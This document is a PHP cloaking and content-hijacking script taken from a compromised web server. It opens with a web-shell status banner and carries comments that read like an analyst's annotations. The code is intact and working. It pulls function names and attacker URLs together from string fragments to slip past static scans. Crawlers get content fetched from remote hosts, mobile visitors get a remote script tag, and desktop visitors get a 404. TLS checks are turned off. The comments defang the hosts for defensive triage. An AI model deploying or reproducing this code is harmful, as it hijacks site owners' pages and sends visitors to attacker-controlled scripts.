| Server IP : 43.141.49.119 / Your IP : 113.219.202.173 Web Server : Apache System : Linux VM-8-5-opencloudos 6.6.34-9.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 19 19:35:45 CST 2024 x86_64 User : www ( 1000) PHP Version : 8.1.27 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/www.ucppt.com/ |
<?php
/**
* Author's header (translated): "Fully optimised version: enhanced trigger
* logic + static detection evasion + reserved hook for remote separation."
*
* Analyst note: the script below selects its output from the request's
* User-Agent, Referer and URI. Crawler User-Agents receive content fetched
* from remote hosts, mobile User-Agents receive a remote script tag, and other
* clients receive a 404 or nothing extra. Triage indicators visible in this
* file: suppressed errors, function names assembled from string fragments,
* cURL options passed as bare integers, and outbound requests to the hosts
* held in $conf.
*/
// Remove the execution time limit; "@" hides any warning raised by the call.
@set_time_limit(0);
// Turn off all error reporting so failures leave no visible output.
@error_reporting(0);
// Declare the response as UTF-8 HTML; "@" hides the warning if headers were already sent.
@header("Content-Type: text/html;charset=utf-8");
// --- 1. Core obfuscation config ---
// Lookup table of function names, each built by concatenating fragments so the
// full name never appears as a literal in the file. The values are later called
// as variable functions ($f['ci'](), ...). A scan for the plain names will not
// match; match on the fragments or on the reassembled strings instead.
$f = [
's' => 'str'.'istr', // stristr
'p' => 'pre'.'g_match', // preg_match
'ci' => 'cur'.'l_init', // curl_init
'ca' => 'cur'.'l_set'.'opt_array', // curl_setopt_array
'ce' => 'cur'.'l_exec', // curl_exec
'co' => 'cur'.'l_get'.'info', // curl_getinfo
'cc' => 'cur'.'l_close' // curl_close
];
// Remote endpoints and matching patterns. The URLs are split into fragments like
// the function names above; the reassembled values are given defanged below so
// they can be searched for in proxy, DNS and firewall logs.
$conf = [
// Reassembles to hxxp://jj.gotzduan[.]com : content source for crawler requests in branch A.
'site' => 'h'.'tt'.'p://j'.'j.g'.'otz'.'dua'.'n.c'.'om',
// Reassembles to hxxps://dd.zgqcyn[.]com/jj.js : script served to mobile visitors in branch A.
'js' => 'h'.'tt'.'ps://d'.'d.zg'.'qc'.'yn.c'.'om/jj'.'.js',
// Reassembles to hxxp://aa.gossopp[.]com/u.php : fetched in branch B when the probe returns 200.
'u1' => 'h'.'tt'.'p://a'.'a.go'.'sso'.'pp.co'.'m/u.p'.'hp',
// Reassembles to hxxp://kgr909[.]com/a.php : fetched in branch B otherwise.
'u2' => 'h'.'tt'.'p://k'.'gr9'.'09.c'.'om/a.p'.'hp',
// Expanded crawler ("spider") User-Agent pool, case-insensitive.
'spid' => '/(Baidu|Sogou|360Spider|Yisou|Toutiao|ByteSpider|PetalBot|BingBot|Googlebot|YandexBot)/i',
// Expanded mobile User-Agent pool, case-insensitive.
'mobi' => '/(iPhone|iPod|Android|Mobile|BlackBerry|IEMobile|UCBrowser|MQQBrowser|JUC|Fennec|wOSBrowser)/i',
// Search-engine Referer check, case-insensitive.
'refe' => '/(baidu|sogou|so\.com|google|sm\.cn|bing)/i'
];
// --- 2. Environment detection variables ---
// Every value below is taken from the incoming request; the User-Agent, Referer
// and Host header are supplied by the client.
$b = $_SERVER;
// User-Agent and Referer default to '' when the header is absent.
$ua = isset($b['HTTP_USER_AGENT']) ? $b['HTTP_USER_AGENT'] : '';
$ref = isset($b['HTTP_REFERER']) ? $b['HTTP_REFERER'] : '';
// REQUEST_URI and HTTP_HOST are read without an isset() check.
$uri = $b['REQUEST_URI'];
$host = $b['HTTP_HOST'];
// Decide whether the request targets one of the listed file types.
// $f['s'] is stristr, so each test is a case-insensitive substring match anywhere
// in the URI (path or query string), not a true suffix check; "scm" is matched
// without a leading dot. Because ".html" is in the list, ordinary HTML page
// requests also set $is_area.
$is_area = $f['s']($uri, ".xml") || $f['s']($uri, ".doc") || $f['s']($uri, ".txt") ||
$f['s']($uri, ".ppt") || $f['s']($uri, ".pptx") || $f['s']($uri, ".xls") ||
$f['s']($uri, ".csv") || $f['s']($uri, ".shtml") || $f['s']($uri, ".asp") || $f['s']($uri, "scm") || $f['s']($uri, ".html");
// --- 3. Core logic (author's label: "core business logic") ---
// Analyst summary: the response depends on who appears to be asking. Crawlers see
// remote content, mobile visitors get a remote script, and desktop visitors get a
// 404 (branch A) or no extra output (branch B). Comparing responses for the same
// URL across different User-Agent and Referer values exposes the cloaking.
if ($is_area) {
// Branch A: the URI contains one of the listed file-type markers.
if ($f['p']($conf['spid'], $ua)) {
// Crawler User-Agent (author's label: "real spider: show remote hijacked content").
// Only the User-Agent string is matched; nothing here verifies the client's identity.
// The host and the URL-encoded request URI are sent to $conf['site'] as query
// parameters ($host is appended unencoded) and the response is echoed as-is.
echo _fetch($conf['site'] . "?domain=" . $host . "&path=" . urlencode($uri));
exit;
} else {
// Not a crawler User-Agent.
if ($f['p']($conf['mobi'], $ua)) {
// Mobile User-Agent (author's label: "output the redirect JS"): the whole response
// is one script tag loading $conf['js']. The tag is split into fragments so the
// literal "<script src=" does not appear in the file.
echo "<scr"."ipt sr"."c=" . $conf['js'] . "></scr"."ipt>";
exit;
} else {
// Ordinary desktop visitor (author's label: "concealed handling"): discard any
// buffered output and answer 404. Desktop requests for matching URIs, including
// ".html", therefore fail with 404, which is a symptom site owners may notice.
@ob_clean();
http_response_code(404);
exit;
}
}
} else {
// Branch B: ordinary page request.
// Trigger: a crawler User-Agent, or a mobile User-Agent arriving with a
// search-engine Referer.
$is_spider = $f['p']($conf['spid'], $ua);
$is_from_search = $f['p']($conf['refe'], $ref);
$is_mobile = $f['p']($conf['mobi'], $ua);
if ($is_spider || ($is_mobile && $is_from_search)) {
// Probe the current URL with "/sadw.shtml" appended; the probe URL is built from
// the request's Host header and REQUEST_URI. The probe result selects which
// remote endpoint's content is echoed into the page.
$testUrl = _current_url() . "/sadw.shtml";
if (_http_code($testUrl) === 200) {
echo _fetch($conf['u1']);
} else {
echo _fetch($conf['u2']);
}
// Push the injected content to the client immediately. There is no exit here, so
// execution continues with whatever follows this block.
if (ob_get_level() > 0) ob_flush();
flush();
}
}
// --- 4. Wrapped utility functions (author's label: "obfuscated version") ---
/**
* Remote fetch: perform an HTTP GET with cURL and return the response body.
*
* cURL options are given as bare integers rather than CURLOPT_* constants, so a
* search for "CURLOPT_" will not find this code; the constant each integer
* stands for is noted per line. TLS peer and host verification are both
* switched off, so the remote endpoint's certificate is never checked.
*
* @param string $url URL to request.
* @return string|bool Result of curl_exec(): the body on success, false on failure.
*/
function _fetch($url) {
// Uses the global function-name table built at the top of the file.
global $f;
$ch = $f['ci'](); // curl_init()
$f['ca']($ch, [ // curl_setopt_array()
10002 => $url, // CURLOPT_URL
10018 => $_SERVER['HTTP_USER_AGENT'], // CURLOPT_USERAGENT: forwards the visitor's User-Agent (read without isset())
64 => FALSE, // CURLOPT_SSL_VERIFYPEER
81 => FALSE, // CURLOPT_SSL_VERIFYHOST
19913 => TRUE, // CURLOPT_RETURNTRANSFER
42 => FALSE, // CURLOPT_HEADER
10102 => 'gzip', // CURLOPT_ENCODING (Accept-Encoding)
13 => 30 // CURLOPT_TIMEOUT, in seconds
]);
$res = $f['ce']($ch); // curl_exec()
$f['cc']($ch); // curl_close()
return $res;
}
/**
* Status-code probe (author's note: "HEAD mode for performance").
*
* Issues a body-less request and returns the HTTP status code that cURL
* recorded. Peer verification is disabled; option 81 (CURLOPT_SSL_VERIFYHOST)
* is not set in this function.
*
* @param string $url URL to probe.
* @return int HTTP status code reported by curl_getinfo(); the caller compares it with 200.
*/
function _http_code($url) {
// Uses the global function-name table built at the top of the file.
global $f;
$ch = $f['ci'](); // curl_init()
$f['ca']($ch, [ // curl_setopt_array()
10002 => $url, // CURLOPT_URL
10018 => $_SERVER['HTTP_USER_AGENT'], // CURLOPT_USERAGENT (read without isset())
64 => FALSE, // CURLOPT_SSL_VERIFYPEER
19913 => TRUE, // CURLOPT_RETURNTRANSFER
44 => TRUE, // CURLOPT_NOBODY
42 => TRUE, // CURLOPT_HEADER
13 => 5 // CURLOPT_TIMEOUT, in seconds
]);
// The response itself is discarded; only the status code is read afterwards.
$f['ce']($ch);
$code = $f['co']($ch, 2097154); // CURLINFO_HTTP_CODE
$f['cc']($ch); // curl_close()
return $code;
}
/**
* Build the full URL of the current request.
*
* The scheme is https only when $_SERVER['HTTPS'] is set and either its value
* is not 'off' or the server port equals 443; otherwise it is http. The scheme
* strings are split into fragments like the other literals in this file.
*
* @return string Scheme + Host header + REQUEST_URI (path and query string).
*/
function _current_url() {
$proto = (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443)) ? "ht"."tp"."s://" : "ht"."tp://";
// HTTP_HOST comes from the client's Host header, so the returned URL is derived from request data.
return $proto . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}